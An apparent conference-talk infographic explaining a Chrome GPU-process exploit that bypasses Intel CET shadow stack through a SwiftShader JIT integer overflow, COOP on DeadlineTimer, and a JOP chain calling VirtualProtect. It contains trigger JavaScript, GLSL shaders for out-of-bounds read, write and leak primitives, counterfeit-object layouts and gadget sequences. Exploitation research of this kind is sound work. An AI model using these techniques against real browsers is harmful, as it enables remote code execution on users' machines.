Bypassing Intel CET Shadow Stack

An infographic detailing the CVE-2023-3598 "SwiftZero" Chrome sandbox escape which bypasses Intel CET Shadow Stack on Windows x64.

Intel CET Shadow Stack

A Hardware Defense

Intel's Control-flow Enforcement Technology (CET) is a hardware-level defense. Its key feature for this talk is the Shadow Stack, a CPU-protected stack that creates a secure record of return addresses to prevent backward-edge control flow attacks.

The Audit

On every function return, the CPU compares the return address on the normal stack with the one on the Shadow Stack. If they do not match, the CPU raises a control protection (#CP) fault and the process is terminated. This is designed to block return-oriented programming (ROP) attacks.

Normal Function Call with CET

1. Example Code


void foo() { /* ... */ }

int main() {
  foo(); // <-- CALL
  // <-- return addr is here
  return 0;
}

2. Resulting Stacks

Call Stack
...
return addr
foo() stack frame
Shadow Stack
...
return addr

The call instruction pushes the return address to both stacks simultaneously.

3. When Return Addresses Mismatch

Call Stack
...
corrupted addr
foo() stack frame
Shadow Stack
...
real return addr

#CP Fault: Process Terminated

CPU detects mismatch during RET instruction and triggers a hardware fault.
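
The call and return behaviour described above can be approximated with a small simulation. This is only a toy model, assuming a CPU that tracks nothing but return addresses; the class name `ToyCpu`, the exception name, and all addresses are made up for illustration and do not correspond to any real API.

```python
class ControlProtectionFault(Exception):
    """Stands in for the #CP fault the CPU raises on a mismatch."""


class ToyCpu:
    """Toy model: tracks only return addresses, not full stack frames."""

    def __init__(self):
        self.call_stack = []    # ordinary stack, writable by the program
        self.shadow_stack = []  # CPU-protected copy of return addresses

    def call(self, return_addr):
        # CALL pushes the return address onto both stacks.
        self.call_stack.append(return_addr)
        self.shadow_stack.append(return_addr)

    def ret(self):
        # RET pops both copies and compares them.
        addr = self.call_stack.pop()
        expected = self.shadow_stack.pop()
        if addr != expected:
            raise ControlProtectionFault(
                f"return to {addr:#x}, shadow stack expected {expected:#x}")
        return addr


cpu = ToyCpu()
cpu.call(0x401005)               # main calls foo (made-up address)
assert cpu.ret() == 0x401005     # untouched stack: the return succeeds

cpu.call(0x401005)
cpu.call_stack[-1] = 0x41414141  # simulate a stack buffer overflow
try:
    cpu.ret()
    faulted = False
except ControlProtectionFault:
    faulted = True
print("fault raised:", faulted)
```

The program can overwrite `call_stack` freely, but it has no way to touch `shadow_stack`, which is why the corrupted return is caught.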

How CET Defeats ROP

1. ROP Gadget

pop rcx
ret

A typical gadget found in legitimate code.

2. How ROP Fails

Call Stack
ROP gadget addr
ROP gadget addr
value for RCX
Shadow Stack
...
legitimate addr

MISMATCH: #CP Fault on ret

How CET Hinders JOP

1. JOP Gadget

mov rcx, [rbx]
jmp rcx ; <-- VirtualProtect

A gadget to perform an action and jump.

2. How JOP Can Fail

Hijacks control to a JOP gadget

JOP gadget jumps to VirtualProtect

VirtualProtect finishes and executes ret

Shadow Stack still expects the original return address.

MISMATCH: #CP Fault on ret

How CET Hinders COP

1. COP Gadget

; COP gadget found in real code
mov rdx, [rax+0x20]    ; Load VirtualProtect addr
call rdx               ; Call VirtualProtect - SUCCESS!
mov rbx, [rax+0x30]    ; ← VirtualProtect returns HERE
add rsp, 0x28          ; Unwanted stack manipulation
pop r14                ; Destroys register state

Real gadgets contain trailing instructions that disrupt the attacker's control flow.

2. How COP Can Fail

Attacker controls [rax+0x20] = &VirtualProtect

call rdx → VirtualProtect()

Shadow Stack: must return to line 4

VirtualProtect() executes & returns

Returns to line 4 (unwanted!)

Stack manipulation destroys control

add rsp, 0x28; pop r14

Control flow completely lost

COP can call one function, but can't skip the destructive instructions that follow.

The Road to CET

2016
Intel Publishes CET Specs

The initial specification is released to give the software ecosystem time to prepare.

2020
Hardware & OS Support Arrives

Intel releases 11th Gen "Tiger Lake" CPUs with CET. Microsoft enables "Hardware-enforced Stack Protection" in Windows 10 (20H1).

2021
Browser Adoption Begins

Google starts enabling CET support in Chrome 90.

2022
Protection Extends to the Core

Microsoft introduces Kernel-mode Hardware-enforced Stack Protection in Windows 11 (22H2).

CET's deployment was a multi-year collaboration between hardware, OS, and application vendors.

Windows' Compatibility Mode

Windows doesn't just turn CET on. It uses a flexible system called "Hardware-enforced Stack Protection" (HSP). This compatibility mode introduces specific rules that an attacker can potentially exploit.

Kernel Fault Investigation Logic

#CP Fault Triggered

CPU detects mismatch

Kernel Investigates

KiControlProtectionFault

ALLOW Cases

Return address found on Shadow Stack?

ALLOW

Legitimate return

Return from non-CETCOMPAT dynamic code?

ALLOW

JIT/interpreted code exemption

Return from non-CETCOMPAT module?

ALLOW

Legacy compatibility

TERMINATE Cases

Return from CETCOMPAT code without valid Shadow Stack entry?

TERMINATE

CET violation detected

Return from CETCOMPAT module with mismatch?

TERMINATE

CET violation detected
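
The ALLOW and TERMINATE cases listed above can be summarised as a small decision function. This is a simplified sketch of the rules as this infographic states them, not the actual logic of KiControlProtectionFault; the `FaultContext` fields and the `investigate` function are hypothetical names chosen for illustration.

```python
from dataclasses import dataclass
from enum import Enum


class Verdict(Enum):
    ALLOW = "ALLOW"
    TERMINATE = "TERMINATE"


@dataclass
class FaultContext:
    # Hypothetical inputs; the real kernel data structures are not shown here.
    target_on_shadow_stack: bool  # return target appears on the Shadow Stack
    cetcompat: bool               # returning code is marked CETCOMPAT
    dynamic_code: bool = False    # runtime-generated code (informational only)


def investigate(ctx: FaultContext) -> Verdict:
    if ctx.target_on_shadow_stack:
        return Verdict.ALLOW      # legitimate return
    if not ctx.cetcompat:
        return Verdict.ALLOW      # dynamic-code exemption or legacy module
    return Verdict.TERMINATE      # CETCOMPAT code with a mismatch


jit_return = FaultContext(target_on_shadow_stack=False, cetcompat=False,
                          dynamic_code=True)
compat_return = FaultContext(target_on_shadow_stack=False, cetcompat=True)
print(investigate(jit_return).value)     # non-CETCOMPAT dynamic code
print(investigate(compat_return).value)  # CETCOMPAT module
```

In this model the only thing separating the two mismatching returns is whether the returning code is marked CETCOMPAT.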

Key Insight

The kernel's compatibility exemptions for non-CETCOMPAT dynamic code (like JIT-compiled shaders) create a bypass opportunity. SwiftShader's JIT code is exempt from CET enforcement, allowing our exploit to work.

The SwiftZero Bug (CVE-2023-3598)

The vulnerability (CVE-2023-3598) lies within SwiftShader's JIT compiler. A 32-bit integer overflow when calculating stack space for large shader variables leads to a classic stack-based buffer overflow.

The Vulnerable Code: Cfg::sortAndCombineAllocas

void Cfg::sortAndCombineAllocas(CfgVector<InstAlloca *> &Allocas,
                                uint32_t CombinedAlignment, InstList &Insts,
                                AllocaBaseVariableType BaseVariableType) {
  if (Allocas.empty())
    return;
    ...
  uint32_t CurrentOffset = 0;  // 32-bit integer can overflow!
  CfgVector<int32_t> Offsets;
  
  // The vulnerable loop:
  for (Inst *Instr : Allocas) {
    auto *Alloca = llvm::cast<InstAlloca>(Instr);
    uint32_t Alignment = std::max(Alloca->getAlignInBytes(), 1u);
    auto *ConstSize = 
        llvm::dyn_cast<ConstantInteger32>(Alloca->getSizeInBytes());
    // Size can be controlled by attacker via shader code
    uint32_t Size = Utils::applyAlignment(ConstSize->getValue(), Alignment);
    
    ...
    Offsets.push_back(...);
    CurrentOffset += Size;  // INTEGER OVERFLOW HERE!
  }
  
  // Round the offset up to the alignment to determine the final allocation size
  uint32_t TotalSize = Utils::applyAlignment(CurrentOffset, CombinedAlignment);
  ...
}

Line 7: CurrentOffset is a 32-bit unsigned integer that can overflow

Line 17: Size can be controlled by attacker via shader code

Line 21: Integer overflow occurs here when CurrentOffset wraps around

Line 25: The overflowed value leads to an undersized allocation

You can craft shader variables large enough to cause CurrentOffset to wrap around, resulting in an undersized stack frame allocation.
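
The wraparound can be reproduced with plain arithmetic. The sketch below is a simplified model of the accumulation loop, assuming 32-bit unsigned arithmetic and a power-of-two alignment; the helper names and the alloca sizes are hypothetical, and they are not the sizes SwiftShader actually computes for any particular shader.

```python
MASK32 = 0xFFFFFFFF  # emulate uint32_t arithmetic


def apply_alignment(value, alignment):
    """Round value up to a multiple of alignment (a power of two), in 32 bits."""
    return (value + alignment - 1) & ~(alignment - 1) & MASK32


def combine_allocas(sizes, alignment=16):
    """Return (offsets, total_size) as a uint32_t accumulator would compute them."""
    offsets = []
    current_offset = 0
    for size in sizes:
        offsets.append(current_offset)
        aligned = apply_alignment(size, alignment)
        current_offset = (current_offset + aligned) & MASK32  # wraps silently
    return offsets, apply_alignment(current_offset, alignment)


# Hypothetical alloca sizes: one small, one huge, one small.
sizes = [0x100, 0xFFFFFF00, 0x40]
offsets, total = combine_allocas(sizes)

print("true sum  :", hex(sum(sizes)))
print("32-bit sum:", hex(total))
print("offsets   :", [hex(o) for o in offsets])
```

With these sizes the true total needs 33 bits, so the 32-bit total wraps to 0x40 while the second variable still sits at offset 0x100, which is already outside the 0x40-byte frame.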

View the full source code on GitHub

Compiling a Shader

(() => {
    // Create a temporary canvas to get a WebGL2 context
    const canvas = document.createElement('canvas');
    const gl = canvas.getContext('webgl2');

    if (!gl) {
        console.error("WebGL 2 is not available on your browser.");
        return;
    }

    // Oversized-array vertex shader; trim() below keeps #version on the first line
    const vsSource = `
        #version 300 es
        mat4 buf[0xffffff]; // Trigger the overflow in sortAndCombineAllocas
        void main() {
            buf[1][2][3]=uintBitsToFloat(0x41414141);
    }`.trim();

    // --- The Compilation Process ---
    const shader = gl.createShader(gl.VERTEX_SHADER);
    gl.shaderSource(shader, vsSource);
    gl.compileShader(shader);

    // --- Check the Result ---
    if (gl.getShaderParameter(shader, gl.COMPILE_STATUS)) {
        console.log("Shader compiled successfully!");
    } else {
        console.error("Shader compilation failed:");
        console.error(gl.getShaderInfoLog(shader));
    }
})();

Client-Side Shader Compilation via WebGL2 using JavaScript

Line 14: Large array triggers integer overflow

Memory Corruption: Out-of-Bounds Write

1. Shader Code


#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xffffff];
void main() {
  // These writes go out of bounds
  buf[1][2][3]=uintBitsToFloat(0x41414141);
}

Line 4: Large array triggers integer overflow

Line 7: Out-of-bounds write overwrites return address

2. Result: Memory Corruption

Memory Layout
Target: 0x4141414141414141 (return addr)
...writable memory in between...
Array bounds end here
buf[0xffffff]

Writing past array bounds corrupts sensitive stack data such as return addresses.

Information Disclosure: Out-of-Bounds Read

1. Shader Code


#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xffffff];
flat out uint returnAddr;
void main() {
    // These reads go out of bounds
    returnAddr = floatBitsToUint(buf[1][2][3]);
}

Line 4: Large array triggers integer overflow

Line 8: Out-of-bounds read leaks return address

2. Result: Memory Disclosure

Memory Layout
Target: 0x7fff12345678 (return addr)
...readable memory in between...
Array bounds end here
buf[0xffffff]

Reading past array bounds exposes sensitive stack data like the return addresses.

Allocation and Leak Primitive

1. Shader Code


#version 300 es
mat4 buf[0xffffff];
flat out uint value;
layout(std140) uniform Buffer {
    uint value[0x100];
} buffer;
uint extra[0x10];

void main() {
    // Read and write operations to
    // avoid compiler optimizations
    buf[0][0][0] = uintBitsToFloat(buffer.value[0x1]);
    extra[0] = floatBitsToUint(buf[0][0][0]);
    buf[0][0][1] = uintBitsToFloat(extra[0]);
    // Leak the address of the Uniform Buffer Object
    value = floatBitsToUint(buf[0][2][2]);
}

Line 3: Large array triggers integer overflow

Lines 13-15: Forces allocation of GlUniformBufferObject

Line 17: Leaks address of the Uniform Buffer Object

2. Result: Controlled Allocation

Memory Layout
Target: 0x23adfe0b100 (UBO addr)
...allocated memory in between...
Array bounds end here
buf[0xffffff]

The shader forces allocation of a GlUniformBufferObject and leaks its address for precise memory layout control.

The Exploitation Challenge

What We Have
  • Read Primitive: Can leak stack addresses
  • Write Primitive: Can write values to the stack
  • Allocation Control: Can place controlled data at known locations
  • IP Control: Can hijack the instruction pointer
What's Blocking Us
  • CET defeats ROP: Shadow Stack validates returns
  • CET hinders JOP: Jumping to code that still needs to return
  • CET hinders COP: Difficult to maintain control of IP
  • Need a new approach...

So what can we do?

We need a technique that:

  1. Uses legitimate function calls
  2. Leverages existing code
  3. Works within CET's rules

Counterfeit Object-Oriented Programming

COOP: A code reuse attack targeting C++ applications, introduced by Felix Schuster et al. in 2015.

C++ Classes: With vs Without Virtual Functions

1. Regular Class (No Virtuals)

class SimpleTimer {
    uint64_t deadline;
    bool active;
public:
    void Stop() { active = false; }  // Direct call
    void Run() { /* execute */ }     // Direct call
};

SimpleTimer* timer = new SimpleTimer();
timer->Stop();  // Direct function call

Lines 5-6: Regular functions use direct calls

SimpleTimer Object
0x00:deadline
0x08:active

No vtable pointer - just data members

2. Class with Virtual Functions

class Timer {
    void* vtable_ptr;  // Hidden, compiler-added
    uint64_t deadline;
public:
    virtual void Stop() { ... }  // Indirect call
    virtual void Run() { ... }   // Indirect call
};

Timer* timer = new Timer();
timer->Run();  // Virtual call through vtable

Lines 5-6: Virtual functions require vtable lookup

Timer Object
0x00:vtable_ptr
0x08:deadline
VTable
0x00:&Stop
0x08:&Run

Hidden vtable pointer added as first member

Key Difference: Function Call Assembly

Regular Function Call

call SimpleTimer::Stop  ; Direct call to known address

Virtual Function Call

mov rax, [rcx]       ; Load vtable pointer
call [rax+0x8]      ; Indirect call through vtable

Virtual functions enable polymorphism but introduce indirection that COOP exploits

The COOP Attack Principle

Counterfeit Objects Replace Real Ones

1. Control Object Layout

Attacker creates fake objects with controlled vtable pointers

Fake Timer Object
0x00:&FakeTimerVtable
0x08:data...
FakeTimerVtable
0x00:&VirtualProtect
0x08:&Shellcode

2. Hijack Virtual Calls

Virtual function calls become attacker-controlled indirect calls

; timer->Stop() becomes:
mov rax, [rcx]       ; Load fake vtable
call [rax+0x00]      ; Calls VirtualProtect!

; timer->Run() becomes:
call [rax+0x08]      ; Executes shellcode!

3. Chain Functions

Chain existing functions together to achieve arbitrary behavior

// Original code path:
timer->Stop();  // 1. VirtualProtect
timer->Run();   // 2. Shellcode

// Result: Memory made executable,
// then shellcode runs

COOP bypasses CFI by using legitimate virtual call sites with counterfeit objects.
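
The indirection that COOP relies on can be illustrated with a toy memory model. This sketch only mimics the two-step lookup `mov rax, [rcx]` / `call [rax+offset]`; the addresses, the `memory` dictionary, and the harmless stand-in functions are all invented for illustration and do not model any real process.

```python
def stop():
    return "Timer.Stop"


def run():
    return "Timer.Run"


def unrelated_function():
    return "some other existing function"


# Toy "memory": address -> value. All addresses are made up.
memory = {}

REAL_VTABLE = 0x1000
memory[REAL_VTABLE + 0x00] = stop
memory[REAL_VTABLE + 0x08] = run

REAL_TIMER = 0x2000
memory[REAL_TIMER] = REAL_VTABLE   # offset 0x00 of the object: vtable pointer

# A counterfeit object has the same shape but points at a different table.
FAKE_VTABLE = 0x3000
memory[FAKE_VTABLE + 0x00] = unrelated_function
memory[FAKE_VTABLE + 0x08] = unrelated_function

FAKE_TIMER = 0x4000
memory[FAKE_TIMER] = FAKE_VTABLE


def virtual_call(obj_addr, slot_offset):
    """Model of: mov rax, [rcx] ; call [rax+slot_offset]."""
    vtable = memory[obj_addr]              # load the vtable pointer
    target = memory[vtable + slot_offset]  # load the function pointer
    return target()


print(virtual_call(REAL_TIMER, 0x08))  # dispatches to run()
print(virtual_call(FAKE_TIMER, 0x08))  # same call site, different target
```

The call site is identical in both cases; only the data it reads differs, which is why the technique operates on objects rather than on return addresses.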

Finding the Perfect COOP Gadget

Requirements for Our Virtual Call Site

1. Make Memory Executable (GlUniformBufferObject)

First virtual call must be redirectable to VirtualProtect

2. Execute Our Code

Second virtual call must call our shellcode

The Perfect Target: DeadlineTimer::OnScheduledTaskInvoked

void DeadlineTimer::OnScheduledTaskInvoked() {
  DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_);
  DCHECK(!delayed_task_handle_.IsValid());

  // Make a local copy of the task to run. The Stop method will reset the
  // |user_task_| member.
  OnceClosure task = std::move(user_task_);
  Stop();                  // Virtual call #1 - Perfect for VirtualProtect
  std::move(task).Run();   // Virtual call #2 - Perfect for shellcode execution
}

Line 8: First virtual call - we'll hijack this to call VirtualProtect

Line 9: Second virtual call - we'll hijack this to execute our shellcode

Two sequential virtual calls with controlled object = perfect COOP gadget

View the full source code on Chromium

Disassembly Analysis: How The COOP Gadget Works

; DeadlineTimer::OnScheduledTaskInvoked()
; RCX = `this` pointer 
; (points to our FakeDeadlineTimer object)
push rsi
sub rsp, 0x20

; --- Part 1: Move the task object (std::move(user_task_)) ---
mov rax, [rcx]                       ; Load vtable pointer from our fake object
mov rsi, [rcx+0x48]                  ; Load 'user_task_' pointer (points to our payload)
mov qword ptr [rcx+0x48], 0          ; Zero out the pointer

; --- Part 2: Call Stop()            -> Hijacked to call VirtualProtect ---
mov rax, [rax+0x10]                  ; Load function pointer from fake vtable offset 0x10
                                     ; We placed &VirtualProtect here
call __guard_dispatch_icall_fptr
                                     ; CFG allows this - VirtualProtect is a valid target!
                                     ; Makes our shellcode executable

; --- Part 3: Call Run()             -> Hijacked to execute shellcode ---
mov rax, [rsi+8]                     ; Load &Payload from our counterfeit object

mov rcx, rsi                         ; Set 'this' pointer for the call
call __guard_dispatch_icall_fptr     ; Executes our shellcode

; --- Cleanup ---
test rsi, rsi
jne chrome.0x7~
add rsp, 0x20
pop rsi
ret

Line 8: Loads our controlled vtable pointer

Line 9: Loads user_task_ which points to our payload

Line 13: Loads VirtualProtect from our fake vtable

Line 15: Calls VirtualProtect

Line 20: Loads &Shellcode from our counterfeit payload object

Line 23: Second hijacked call - calls our shellcode

Why This COOP Gadget is Perfect

  • Two virtual calls in sequence - exactly what we need
  • No validation between calls - both execute unconditionally
  • CFG allows VirtualProtect as a valid call target
  • The object pointer (RCX) is preserved between calls
  • Common function in Chrome - likely to be present

Counterfeit Object Layout

FakeDeadlineTimer
0x00:&FakeVtable
0x08:padding
......
0x48:&FakeDeadlineTimer+0x50
0x50:0x0000000000000000
0x58:&Shellcode
0x60:Shellcode bytes...

Counterfeit object in GlUniformBuffer

FakeVtable
0x00:unused
0x08:unused
0x10:&VirtualProtect
0x18:unused

Stop() → VirtualProtect

Payload Structure
0x00:0x0000000000000000
0x08:&Shellcode

Run() → Shellcode

The object's user_task_ member (offset 0x48) points to offset 0x50, creating a self-referential structure that satisfies the COOP gadget's requirements.

Finding JOP Gadgets for Argument Setup

The Challenge: Setting VirtualProtect Arguments

VirtualProtect requires specific arguments in the Windows x64 calling convention:

VirtualProtect Parameters
BOOL VirtualProtect(
  LPVOID lpAddress,      // RCX: Our fake object
  SIZE_T dwSize,         // RDX: Size to protect
  DWORD  flNewProtect,   // R8:  PAGE_EXECUTE_READWRITE
  PDWORD lpflOldProtect  // R9:  Output buffer
);
What We Need
  • RCX → Address of our counterfeit object
  • RDX → Size (e.g., 0x1000)
  • R8 → 0x40 (PAGE_EXECUTE_READWRITE)
  • R9 → Valid writable address
  • Then jump to our COOP gadget

The Perfect JOP Chain

What we wish we could have found
pop rdx       ; Pop value for dwSize (0x1000)
pop r8        ; Pop value for flNewProtect (0x40 = PAGE_EXECUTE_READWRITE)
pop r9        ; Pop value for lpflOldProtect (writable address)
pop rcx       ; Pop pointer to our FakeDeadlineTimerObject
pop rax       ; Pop address of DeadlineTimer::OnScheduledTaskInvoked
jmp rax       ; Jump to our COOP gadget

Lines 1-4: Set up all arguments for VirtualProtect

Line 6: Transfer control to our COOP gadget

Example Stack Layout for this

0x1000 (dwSize)
0x40 (PAGE_EXECUTE_READWRITE)
&OldProtect (writable addr)
&FakeDeadlineTimer
&OnScheduledTaskInvoked
...

Stack is prepared with all arguments before jumping to JOP gadget


The Full Exploit Chain

With control over the instruction pointer but facing modern defenses, the exploit uses a multi-stage process to achieve code execution.

Stage 1: First, We Craft Our Fake Object

Using our bug primitives, we allocate a uniform buffer (GlUniformBufferObject) and craft a counterfeit `DeadlineTimer` object inside it. We control its entire layout.

Stage 2: Stack Setup & Initial Control

Before triggering the final return, we use the bug's primitives to prepare the stack:

  • Leak Object Address: The counterfeit object's memory location is discovered using the read primitive.
  • Populate JOP Chain: The stack is carefully filled with gadget addresses for argument setup using the write primitive.
  • Hijack Return Address: The saved RIP is overwritten to point to the start of our JOP chain.
  • The shader finishes and executes the RET instruction.

Stage 3: CET Bypass

The kernel's compatibility logic checks the return. Since the shader is non-CETCOMPAT dynamic code, the return is ALLOWED.

Shadow Stack is bypassed. RIP now points to our JOP chain.

Stage 4: Argument Engineering

A "call-less" JOP chain executes, loading registers with arguments for `VirtualProtect` and placing a pointer to our Counterfeit Object into `RCX`.

pop rdx       ; Pop value for dwSize
pop r8        ; Pop value for flNewProtect
pop r9        ; Pop value for lpflOldProtect
pop rcx       ; Pop pointer to our FakeDeadlineTimerObject
pop rax       ; Pop address for the next jump target
jmp rax       ; Jump to DeadlineTimer::OnScheduledTaskInvoked

This idealized gadget sequence sets all arguments for VirtualProtect, then jumps to our target function.

Stage 5: Counterfeit Object Execution

void DeadlineTimer::OnScheduledTaskInvoked() {
  
    // Move our user_task_ obj
    OnceClosure task = std::move(user_task_);

    // &VirtualProtect
    Stop();

    // &Shellcode
    std::move(task).Run();
}

Line 7: Stop() hijacked to call VirtualProtect

Line 10: Run() hijacked to execute shellcode

Stage 6: LPE

The shellcode runs in the GPU process, where it downloads and executes a local privilege escalation (LPE) payload.